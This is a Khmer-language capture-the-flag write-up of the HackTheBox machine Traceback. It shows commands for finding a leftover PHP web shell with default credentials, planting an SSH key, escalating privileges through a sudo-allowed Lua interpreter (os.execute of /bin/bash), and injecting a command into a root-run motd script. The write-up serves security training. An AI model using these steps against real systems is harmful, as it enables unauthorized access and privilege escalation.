This page looks best with JavaScript enabled

HackTheBox - Traceback

 ·  β˜• 3 min read  ·  🐱 thik

traceback-10.10.10.181

Recon

αž‡αžΆαžŠαŸ†αž”αžΌαž„αžαŸ’αž‰αž»αŸ†αž”αŸ’αžšαžΎ Nmap αžŠαžΎαž˜αŸ’αž”αžΈαžŸαŸ’αžœαŸ‚αž„αžšαž€αž•αžαžŠαŸ‚αž›αž”αžΆαž“αž”αžΎαž€ αž“αž·αž„αžŸαŸαžœαžΆαž€αž˜αŸ’αž˜αžŠαŸ‚αž›αž”αžΆαž“αž”αŸ’αžšαžΎ

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
:~$ sudo nmap -sC -sV 10.10.10.181 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-21 13:29 +07
Nmap scan report for 10.10.10.181
Host is up (0.29s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

αžŠαžΌαž…αžŠαŸ‚αž›αž”αžΆαž“αžƒαžΎαž‰ αž‚αžΊαž˜αžΆαž“αžαŸ‚αž•αžαž–αžΈαžšαž”αŸ‰αž»αžŽαŸ’αž“αŸ„αŸ‡αžŠαŸ‚αž›αž”αžΆαž“αž”αžΎαž€αž‚αžΊαž•αž ្្(ssh) αž“αž·αž„αž•αž„ ៨០(http)

OSINT

αž€αŸ’αžšαŸ„αž™αž–αžΈαžŸαŸ’αž€αŸαž“αžšαž½αž…αž˜αž€αžαŸ’αž‰αž»αŸ†αž€αŸαž…αžΌαž›αž‘αŸ…αž€αžΆαž“αŸ‹αž’αžΆαžŸαŸαž™αžŠαŸ’αž‹αžΆαž“ http://10.10.10.181:80 αž αžΎαž™αž€αŸαž”αžΆαž“αžƒαžΎαž‰αžŠαžΌαž…αžšαžΌαž”αžŠαžΌαž…αžαžΆαž„αž€αŸ’αžšαŸ„αž˜αŸ–

traceback-10.10.10.181

αžαŸ’αž‰αž»αŸ†αž…αž»αž… Ctrl+U αžŠαžΎαž˜αŸ’αž”αžΈαž…αžΌαž›αž˜αžΎαž›αž€αžΌαžŠαžαžΆαž„αž€αŸ’αž“αž»αž„ αž€αŸαžƒαžΎαž‰αž˜αžΆαž“αž“αžΌαžœαž–αŸαžαŸŒαž˜αžΆαž“αž˜αž½αž™αž…αŸ†αž“αž½αž“αŸ–

traceback-10.10.10.181

αžαŸ’αž‰αž»αŸ†αž…αžΆαž”αŸ‹αž•αŸ’αžŠαžΎαž˜αžŸαŸ’αžœαŸ‚αž„αžšαž€αžˆαŸ’αž˜αŸ„αŸ‡αž˜αŸ’αž…αžΆαžŸαŸ‹αž‚αžŽαž“αžΈ Xh4H αž“αŸ…αž€αŸ’αž“αž»αž„ Google αž αžΎαž™αž€αŸαž”αžΆαž“αžšαž€αžƒαžΎαž‰αž“αžΌαžœ Github αžšαž”αžŸαŸ‹αž˜αŸ’αž…αžΆαžŸαŸ‹αž‚αžŽαž“αžΈαŸ”
αž”αž“αŸ’αž‘αžΆαž”αŸ‹αž˜αž€αžαŸ’αž‰αž»αŸ†αž”αžΆαž“αž…αžΌαž›αž‘αŸ…αž˜αžΎαž›αž€αŸ’αž“αž»αž„ Repositories αž“αŸ„αŸ‡αž αžΎαž™αž€αŸαžƒαžΎαž‰αž˜αžΆαž“ Repository αž˜αž½αž™αž˜αžΆαž“αžˆαŸ’αž˜αŸ„αŸ‡αžαžΆ Web-Shells

traceback-10.10.10.181

αžαŸ’αž‰αž»αŸ†αž”αžΆαž“αžŸαžΆαž€αž›αŸ’αž”αž„αž…αžΌαž›αž‘αŸ…αžαžΆαž˜αžˆαŸ’αž˜αŸ„αŸ‡αžšαž”αžŸαŸ‹ Shell αžšαž αžΌαžαžŠαž›αŸ‹αž―αž€αžŸαžΆαžšαžˆαŸ’αž˜αŸ„αŸ‡αžαžΆ smevk.php αžŠαŸ‚αž›αž›αŸ„αžαž…αŸαž‰αž“αŸ…αž•αŸ’αž‘αžΆαŸ†αž„αž”αŸ†αž–αŸαž‰αž”αŸ‚αž”αž”αžαŸ‹αž…αžΌαž›

traceback-10.10.10.181

αž›αŸαžαžŸαŸ†αž„αžΆαžαŸ‹αžšαž”αžŸαŸ‹αžœαžΆαž‚αžΊ admin/admin αžαŸ’αž‰αž»αŸ†αž€αŸαž”αžΆαž“αž…αžΌαž›αž‘αŸ…αž€αŸ’αž“αž»αž„ Web Server αž”αžΆαž“αžŸαž˜αŸ’αžšαŸαž…αŸ”

traceback-10.10.10.181

Get User

αžŠαžΎαž˜αŸ’αž”αžΈαž”αžΆαž“ User Flag αž‡αžΆαžŠαŸ†αž”αžΌαž„αžαŸ’αž‰αž»αŸ†αž”αžΆαž“αž…αžΌαž›αž‘αŸ…αž€αŸ’αž“αž»αž„ /home/ αžαžΆαž˜αžšαž™αŸˆ Web-Shell αž αžΎαž™αž€αŸαžƒαžΎαž‰αž˜αžΆαž“αž‚αžŽαž“αžΈαž’αŸ’αž“αž€αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹αž…αŸ†αž“αž½αž“αž–αžΈαžš sysadmin/webadmin αžŠαŸ„αž™αž‚αžŽαž“αžΈ sysadmin αžαŸ’αž‰αž»αŸ†αž˜αž·αž“αž’αžΆαž…αž˜αžΆαž“αžŸαž·αž‘αŸ’αž’αž·αž…αžΌαž›αž‘αŸ…αž€αŸ’αž“αž»αž„αž”αžΆαž“αž‘αŸαžŠαžΌαž…αž“αŸαŸ‡αžαŸ’αž‰αž»αŸ†αž…αžΌαž›αž”αžΆαž“αžαŸ‚αž‚αžŽαž“αžΈ webadmin αž˜αž½αž™αž”αŸ‰αž»αžŽαŸ’αž“αŸ„αŸ‡αŸ”

αž€αŸ’αžšαŸ„αž™αž˜αž€αžαŸ’αž‰αž»αŸ†αž€αŸαžƒαžΎαž‰αž˜αžΆαž“αžαžαž―αž€αžŸαžΆαžšαž˜αž½αž™αžˆαŸ’αž˜αŸ„αŸ‡αžαžΆ .ssh αž“αž·αž„ αž―αž„αžŸαžΆαžšαž˜αž½αž™αž‘αŸ€αžαžˆαŸ’αž˜αŸ„αŸ‡αžαžΆ authorised_keys

traceback-10.10.10.181

αžŠαžΌαž…αž“αŸαŸ‡αžαŸ’αž‰αž»αŸ†αž€αŸαž”αžΆαž“αž”αž„αŸ’αž€αžΎαžαž“αŸ… SSH-Key αž αžΎαž™αžŠαžΆαž€αŸ‹αžœαžΆαž…αžΌαž›αž‘αŸ…αž€αŸ’αž“αž»αž„αž―αž€αžŸαžΆαžšαž“αŸ„αŸ‡αžŠαžΎαž˜αŸ’αž”αžΈαž˜αžΆαž“αžŸαž·αž‘αŸ’αž’αž·αž…αžΌαž›αž‘αŸ…αž€αžΆαž“αŸ‹αž˜αŸ‰αžΆαžŸαŸŠαžΈαž“αž˜αŸαžαžΆαž˜αžšαž™αŸˆ SSH

traceback-10.10.10.181

αž€αŸ’αžšαŸ„αž™αž–αžΈαž…αžΌαž›αžαžΆαž˜αžšαž™αŸˆ SSH αžšαž½αž…αž˜αž€αžαŸ’αž‰αž»αŸ†αž”αžΆαž“αžƒαžΎαž‰αž―αž€αžŸαžΆαžšαž˜αž½αž™αžˆαŸ’αž˜αŸ„αŸ‡ note.txt αžŠαŸ‚αž›αž€αŸ’αž“αž»αž„αž“αŸ„αŸ‡αž˜αžΆαž“αž’αžαŸ’αžαž“αŸαž™αžαžΆαŸ–

1
2
3
4
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.

αžαŸ’αž‰αž»αŸ†αž€αŸαžŸαžΆαž€αžŸαŸ’αžœαŸ‚αž„αžšαž€αž˜αžΎαž›αž―αž€αžŸαžΆαžšαž“αŸ…αž€αŸ’αž“αž»αž„αž“αŸ„αŸ‡ αž αžΎαž™αž€αŸαž”αžΆαž“αžšαž€αžƒαžΎαž‰αž”αŸ’αžšαžœαžαŸ’αžαž·αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹αž–αžΆαž€αŸ’αž™αž”αž‰αŸ’αž‡αžΆαž…αžΆαžŸαŸ‹αŸ— αžšαž”αžŸαŸ‹αž’αŸ’αž“αž€αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹αžŠαžΌαž…αžαžΆαž„αž€αŸ’αžšαŸ„αž˜αŸ–

1
2
3
4
5
6
7
webadmin@traceback:~$ cat .bash_history
ls -la
sudo -l
nano privesc.lua
sudo -u sysadmin /home/sysadmin/luvit privesc.lua 
rm privesc.lua
logout

αžŠαŸ„αž™αžŠαžΉαž„αžαžΆ luvit αž‡αžΆαž”αŸ’αžšαž—αŸαž‘ lua script αžŠαŸ‚αž›αž˜αžΆαž“αž›αž‘αŸ’αž’αž·αž—αžΆαž–αž€αŸ’αž“αž»αž„αž€αžΆαžš execute αž“αž·αž„αž”αžΎαž€αž˜αžΎαž›αž“αžΌαžœαžšαžΆαž›αŸ‹αž―αž€αžŸαžΆαžšαžŽαžΆαžŠαŸ‚αž›αž˜αžΆαž“αž“αŸ…αž€αŸ’αž“αž»αž„αž‚αžŽαž“αžΈ sysadmin αž”αžΆαž“αžŠαžΌαž…αž“αŸαŸ‡αžαŸ’αž‰αž»αŸ†αž€αŸαž”αž„αŸ’αž€αžΎαž Script αžαžΌαž…αž˜αž½αž™αžŠαžΎαž˜αŸ’αž”αžΈαž…αžΌαž›αž‘αŸ…αž”αžΎαž€αž˜αžΎαž›αž―αž€αžŸαžΆαžš user.txt αžŠαŸ‚αž›αž˜αžΆαž“αž“αŸ…αž€αŸ’αž“αž»αž„αž‚αžŽαž“αžΈ sysadmin αž•αŸ’αž‘αžΆαž›αŸ‹αžαŸ‚αž˜αŸ’αžŠαž„αŸ”

1
webadmin@traceback:~$ echo "os.execute("cat /home/sysadmin/user.txt") > user.lua

αž”αž“αŸ’αž‘αžΆαž”αŸ‹αž˜αž€αžαŸ’αž‰αž»αŸ†αž”αžΆαž“αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹αž―αž€αžŸαžΆαžš luvit αžŠαžŠαŸ‚αž›αžŠαžΎαž˜αŸ’αž”αžΈαž”αžΎαž€αž―αž€αžŸαžΆαžš user.lua

1
2
webadmin@traceback:~$ sudo -u sysadmin /home/sysadmin/luvit user.lua
23c296e8cxxxxxxxxxxxxxxxxxxxxxec

αžŠαžΌαž…αž“αŸαŸ‡αžαŸ’αž‰αž»αŸ†αž€αŸαž‘αž‘αž½αž›αž”αžΆαž“ User Flag αžŠαžΌαž…αžŠαŸ‚αž›αž”αžΆαž“αž”αž„αŸ’αž αžΆαž‰αžαžΆαž„αž›αžΎαŸ”

Get Root

αžŠαŸ„αž™αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹αž―αž€αžŸαžΆαžš luvit αžαŸ’αž‰αž»αŸ†αž’αžΆαž…αž˜αžΆαž“αžŸαž·αž‘αŸ’αž’αž·αž…αžΌαž›αž‡αžΆαž‚αžŽαž“αžΈαžšαž”αžŸαŸ‹ sysadmin αž”αžΆαž“αžŠαŸ„αž™αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹αžœαž·αž’αžΈαžŠαžΌαž…αžαžΆαž„αž€αŸ’αžšαŸ„αž˜αŸ–

1
2
3
webadmin@traceback:~$ echo "os.execute("/bin/bash") > sys.lua
webadmin@traceback:~$ sudo -u sysadmin /home/sysadmin/luvit sys.lua
sysadmin@traceback:~$

αžŠαžΌαž…αžŠαŸ‚αž›αž”αžΆαž“αžƒαžΎαž‰αž‚αžΊαžαŸ’αž‰αž»αŸ†αž˜αžΆαž“αžŸαž·αž‘αŸ’αž’αž·αž”αŸ’αžŠαžΌαžšαž‘αŸ…αž‡αžΆαž‚αžŽαž“αžΈ sysadmin αžœαž·αž‰αžŠαŸ„αž™αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹ Lua Script

αž”αž“αŸ’αž‘αžΆαž”αŸ‹αž–αžΈαž˜αžΆαž“αžŸαž·αž‘αŸ’αž’αž·αž‡αžΆ sysadmin αž αžΎαž™αžαŸ’αž‰αž»αŸ†αž€αŸαžŠαžΆαž€αŸ‹ SSH-Key αž…αžΌαž›αž‘αŸ…αž€αŸ’αž“αž»αž„αž”αŸ’αžšαž’αž”αŸ‹ .ssh αžŠαžΎαž˜αŸ’αž”αžΈαž’αžΆαž… SSH αž…αžΌαž›αž‘αŸ…αž€αŸ’αž“αž»αž„αž‚αžŽαž“αžΈ sysadmin αž”αžΆαž“αžŠαžΌαž…αž–αžΈαž–αŸαž›αž˜αž»αž“αžŠαŸ‚αžšαŸ”

αž”αž“αŸ’αžαž‘αŸ€αžαžαŸ’αž‰αž»αŸ†αžαŸ’αžšαžΌαžœαž€αžΆαžšαž˜αžΎαž› Process αžšαž”αžŸαŸ‹αž‚αžŽαž“αžΈ root αžαžΆαžαžΎαž€αŸ†αž–αž»αž„αžαŸ‚αž”αŸ’αžšαžΎαž–αžΆαž€αŸ’αž™αž”αž‰αŸ’αž‡αžΆαž’αŸ’αžœαžΈαžαŸ’αž›αŸ‡αŸ” αžŠαŸ„αž™αžŸαžΆαžšαžαŸ‚αž˜αž·αž“αž˜αžΆαž“αžŸαž·αž‘αŸ’αž’αž·αž‡αžΆ root αž…αžΉαž„αž αžΎαž™αž‘αžΎαž”αž‡αž˜αŸ’αžšαžΎαžŸαžŠαŸ‚αž›αž›αŸ’αž’αž”αŸ†αž•αž»αžαž‚αžΊαž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹ Tool αžαžΆαž„αž€αŸ’αžšαŸ…αž αžΎαž™ Tool αžŠαŸ‚αž›αžαŸ’αž‰αž»αŸ†αž”αŸ’αžšαžΎαž“αŸ„αŸ‡αž‚αžΊαžˆαŸ’αž˜αŸ„αŸ‡ pspy64 αžŠαŸ‚αž›αžœαžΆαž˜αžΆαž“αž›αž‘αŸ’αž’αž·αž—αžΆαž–αž€αŸ’αž“αž»αž„αž€αžΆαžšαž˜αžΎαž› Process αž‚αŸ’αžšαž”αŸ‹αž‚αžŽαž“αžΈαž‘αžΆαŸ†αž„αž’αžŸαŸ‹αž”αžΎαž‘αŸ„αŸ‡αž”αžΈαž‡αžΆαž‚αŸ’αž˜αžΆαž“αžŸαž·αž‘αŸ’αž’αž·αž‡αžΆ root αž€αŸαžŠαŸ„αž™αŸ”

αž‘αžΆαž‰αž™αž€αŸ– pspy64

αžŠαžΎαž˜αŸ’αž”αžΈ Upload αž―αž€αžŸαžΆαžšαž“αŸαŸ‡αž”αžΆαž“αžαŸ’αž‰αž»αŸ†αžαŸ’αžšαžΌαžœαž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹αž–αžΆαž€αŸ’αž™αž”αž‰αŸ’αž‡αžΆ scp

1
:~$ sudo scp -i id_rsa pspy64 sysadmin@10.10.10.181:/tmp/

αžαŸ’αž‰αž»αŸ†αž”αžΆαž“αž”αžΎαž€αžŠαŸ†αžŽαžΎαžšαž€αžΆαžšαž―αž€αžŸαžΆαžš pspy64 αž“αŸ„αŸ‡ αž αžΎαž™αžœαžΆαž”αžΆαž“αž”αž‰αŸ’αž…αŸαž‰αž“αžΌαžœαž–αŸαžαŸŒαž˜αžΆαž“αžŠαžΌαž…αžαžΆαž„αž€αŸ’αžšαŸ„αž˜αŸ–

1
2
3
4
5
6
2020/05/21 04:02:01 CMD: UID=0    PID=6094   | sleep 30 
2020/05/21 04:02:01 CMD: UID=0    PID=6093   | /bin/sh -c /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/ 
2020/05/21 04:02:01 CMD: UID=0    PID=6092   | /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/ 
2020/05/21 04:02:01 CMD: UID=0    PID=6091   | /usr/sbin/CRON -f 
2020/05/21 04:02:01 CMD: UID=0    PID=6090   | /usr/sbin/CRON -f 
2020/05/21 04:02:31 CMD: UID=0    PID=6096   | /bin/cp /var/backups/.update-motd.d/ /var/backups/.update-motd.d/10-help-text /var/backups/.update-motd.d/50-motd-news /var/backups/.update-motd.d/80-esm /var/backups/.update-motd.d/91-release-upgrade /etc/update-motd.d/

αž’αŸ’αžœαžΈαžŠαŸ‚αž›αž‚αž½αžšαž²αŸ’αž™αž…αžΆαž”αŸ‹αž’αžΆαžšαž˜αŸ’αž˜αžŽαŸαž“αŸ„αŸ‡αž‚αžΊαžαŸ’αžšαž„αŸ‹αž€αž“αŸ’αž›αŸ‚αž„ “/bin/sh -c /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/” αž“αž·αž„ “sleep 30” αž˜αžΆαž“αž“αŸαž™αžαžΆαžšαžΆαž›αŸ‹αž–αŸαž› αŸ£αŸ αžœαž·αž“αžΆαž‘αžΈαž˜αŸ’αžŠαž„αž˜αŸ‰αžΆαžŸαŸŠαžΈαž“αž˜αž½αž™αž“αŸαŸ‡αž“αžΉαž„αž’αŸ’αžœαžΎαž€αžΆαžšαžαžαž…αž˜αŸ’αž›αž„αž‚αŸ’αžšαž”αŸ‹αž―αž€αžŸαžΆαžšαž‘αžΆαŸ†αž„αž’αžŸαŸ‹αžŠαŸ‚αž›αžŸαŸ’αžαž·αžαž“αŸ…αž€αŸ’αž“αž»αž„αžαžαž―αž€αžŸαžΆαžš /var/backups/.update-motd.d/ αž™αž€αž‘αŸ…αžŠαžΆαž€αŸ‹αž…αžΌαž›αž‘αŸ…αž€αŸ’αž“αž»αž„αžαžαž―αž€αžŸαžΆαžš /etc/update-motd.d/ αžŠαŸ‚αž›αž‡αžΆαžαžαž―αž€αžŸαžΆαžšαž˜αŸαžšαž”αžŸαŸ‹αž˜αŸ‰αžΆαžŸαŸŠαžΈαž“ αž“αž·αž„ αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹αžŠαŸ„αž™αž˜αŸ’αž…αžΆαžŸαŸ‹αž‚αžŽαž“αžΈ rootαŸ”

αž€αŸ’αžšαŸ„αž™αž–αžΈαž”αžΆαž“αž…αžΌαž›αž‘αŸ…αž˜αžΎαž›αž―αž€αžŸαžΆαžšαžŠαŸ‚αž›αž˜αžΆαž“αž“αŸ…αž€αŸ’αž“αž»αž„αžαžαž―αž€αžŸαžΆαžš /etc/update-motd.d/ αžšαž½αž…αž˜αž€αžαŸ’αž‰αž»αŸ†αžŸαž„αŸ’αž€αŸαžαžƒαžΎαž‰αžαžΆαž―αž€αžŸαžΆαžšαžŠαŸ‚αž›αž˜αžΆαž“αž€αŸ’αž“αž»αž„αž“αŸ„αŸ‡αž‚αžΊαž‡αžΆαžšαž”αžŸαŸ‹αž˜αŸ’αž…αžΆαžŸαŸ‹αž‚αžŽαž“αžΈ root αž”αŸ‰αž»αž“αŸ’αžαŸ‚αž˜αŸ’αž…αžΆαžŸαŸ‹αž‚αžŽαž“αžΈ sysadmin αž€αŸαž’αžΆαž…αž˜αžΆαž“αžŸαž·αž‘αŸ’αž’αž·αž€αŸ‚αž”αŸ’αžšαŸ‚αž”αžΆαž“αž•αž„αžŠαŸ‚αžšαŸ”

αžŠαžΌαž…αž“αŸαŸ‡αžαŸ’αž‰αž»αŸ†αž€αŸαž”αž“αŸ’αžαŸ‚αž˜αž–αžΆαž€αŸ’αž™αž”αž‰αŸ’αž‡αžΆαž˜αž½αž™αž”αž“αŸ’αž‘αžΆαžαŸ‹αž‘αŸ€αž αž‚αžΊ “cat /root/root.txt” αž…αžΌαž›αž‘αŸ…αž€αŸ’αž“αž»αž„αž―αž€αžŸαžΆαžš 00-header αžŠαŸ‚αž›αž‡αžΆαž―αž€αžŸαžΆαžšαž”αž„αŸ’αž αžΆαž‰αž•αŸ’αž‘αžΆαŸ†αž„αž€αŸ’αž”αžΆαž›αž“αŸ…αž–αŸαž›αž…αžΌαž›αžŠαž›αŸ‹αž€αž“αŸ’αž›αŸ‚αž„αžœαžΆαž™αž›αŸαžαžŸαŸ†αž„αžΆαžαŸ‹αžšαž”αžŸαŸ‹ SSH

traceback-10.10.10.181

αž“αŸ…αž–αŸαž›αžšαž½αž…αžšαžΆαž›αŸ‹αž’αžŸαŸ‹αž αžΎαž™αžαŸ’αž‰αž»αŸ†αž”αžΆαž“αž’αŸ’αžœαžΎαž€αžΆαžšαžŸαžΆαž€αž›αŸ’αž”αž„ SSH αž…αžΌαž›αž€αŸ’αž“αž»αž„αž˜αŸ‰αžΆαžŸαŸŠαžΈαž“αž˜αŸαž˜αŸ’αžŠαž„αž‘αŸ€αžαž αžΎαž™αž€αŸαž‘αž‘αž½αž›αž”αžΆαž“… :D

traceback-10.10.10.181

αž–αž·αžαžŽαžΆαžŸαŸ‹ αžŠαžΌαž…αžŠαŸ‚αž›αžƒαžΎαž‰αž…αžΉαž„αž‚αžΊαžαŸ’αž‰αž»αŸ†αž‘αž‘αž½αž›αž”αžΆαž“ Root Flag αž“αŸ…αž–αŸαž›αžŠαŸ‚αž›αž…αžΌαž›αž€αŸ’αž“αž»αž„αž˜αŸ‰αžΆαžŸαŸŠαžΈαž“αž˜αŸαžŠαŸ„αž™αž”αŸ’αžšαžΎ SSHαŸ•

Share on

Thik
WRITTEN BY
thik
Security Researcher